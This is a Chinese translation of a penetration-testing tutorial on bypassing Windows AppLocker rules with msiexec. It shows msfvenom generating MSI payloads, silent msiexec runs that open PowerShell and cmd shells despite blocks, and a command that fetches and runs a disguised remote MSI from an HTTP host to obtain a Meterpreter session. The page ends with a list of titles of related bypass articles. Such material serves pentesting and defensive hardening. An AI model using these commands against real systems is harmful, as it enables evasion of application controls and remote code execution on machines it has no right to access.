當前位置:
首頁 > 新聞 > 繞過AppLocker系列之MSIEXEC的利用

繞過AppLocker系列之MSIEXEC的利用

MSIEXEC是Windows操作系統中的一個實用程序,可用於從命令行安裝或配置產品。 如果環境配置不正確,則使用.MSI文件就可以允許攻擊者執行許可權升級或繞過AppLocker規則。 本文的以下內容表明,當系統配置為不阻止所有用戶執行MSI文件時,那麼系統就得不到正確的保護,因為任何一個AppLocker的可執行規則都可以輕鬆繞過。

可以使用Metasploit 的MsfVenom來生成用於執行命令或有效載荷的.MSI文件。

msfvenom -f msi -p windows/exec CMD=powershell.exe > powershell.msi

No platform was selected, choosing Msf::Module::Platform::Windows from the payload

No Arch selected, selecting Arch: x86 from the payload

No encoder or badchars specified, outputting raw payload

Payload size: 199 bytes

Final size of msi file: 159744 bytes

使用 MsfVenom 生成 MSI 文件

運行powershell.msi 將會打開一個PowerShell會話,這樣就可以繞過AppLocker的規則了,即使已經設置了所有用戶都不可以執行PowerShell。

利用MSIEXEC 運行 PowerShell

同樣可以利用這種方式運行cmd命令,即使Windows系統已經阻止了cmd命令的執行。

msiexec /quiet /i cmd.msi

執行上述命令後,就會彈出cmd的窗口。

另外,msiexec實用程序還可以運行已經重命名過的MSI文件,比如重命名為PNG的MSI文件。 這些文件可以在命令提示符中本地執行或從遠程執行,當然也可以繞過AppLocker規則執行。

msiexec /q /i http://192.168.100.3/tmp/cmd.png

利用MSIEXEC執行PNG文件,彈出cmd

上述操作同樣可以用在Meterpreter payload 執行MSI文件上。

利用MSI 執行 Meterpreter Payload

利用MSIEXEC獲得Meterpreter 會話

本文翻譯自

https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/

點擊展開全文

喜歡這篇文章嗎?立刻分享出去讓更多人知道吧!

本站內容充實豐富,博大精深,小編精選每日熱門資訊,隨時更新,點擊「搶先收到最新資訊」瀏覽吧!


請您繼續閱讀更多來自 嘶吼RoarTalk 的精彩文章:

子域名枚舉、探測工具AQUATONE 使用指南
NSA泄漏工具Esteemaudit 補丁簡要分析
為了更有效率地偷錢,Android root木馬開始試水簡訊扣費詐騙
Windows Server中的 WINS 伺服器遠程內存損壞漏洞分析

TAG:嘶吼RoarTalk |

您可能感興趣

繞過CloudFlare WAF和OWASP CRS 3核心規則集
WhatsApp發現隱私漏洞,允許用戶繞過iOS端的Touch ID或Face ID
使用Burpsuite擴展Hackvertor繞過WAF並解密XOR
自動化系統再次繞過Google reCAPTCHA
繞過nftables/PacketFilter防火牆過濾規則傳輸ICMP/ICMPv6數據包的漏洞詳解(上)
Facebook、谷歌繞過APP Store收集用戶信息,蘋果竟放小扎一馬
利用metasploit繞過UAC的5種方式
手把手教你使用PowerShell繞過AppLocker
如何利用PowerShell診斷腳本執行命令並繞過AppLocker
Win10.net UMCI安全繞過0-day漏洞,POC已公開
powershell中使用ReflectivePEInjection繞過殺毒
Blood:UCH-L1繞過mTOR促進蛋白質合成和MYC誘導型淋巴瘤的發生
CobaltStrike-用「混淆」繞過Windows防火牆
XSS繞過filter高級技術 part1
Grayshift或已找到繞過iOS12 USB限制模式方法
Cellebrite可繞過運行iOS 11設備的安全防護,包括當前的iPhone X
ASWCrypter:該工具生成的Payload可以繞過目前所有的反病毒產品
使用AutoHotkey和Excel中嵌入的惡意腳本來繞過檢測
繞過OLED 三星明年推出家用Micro LED電視
使用PowerShell腳本執行命令並繞過AppLocker;Ruby CVE-2017-17405 分析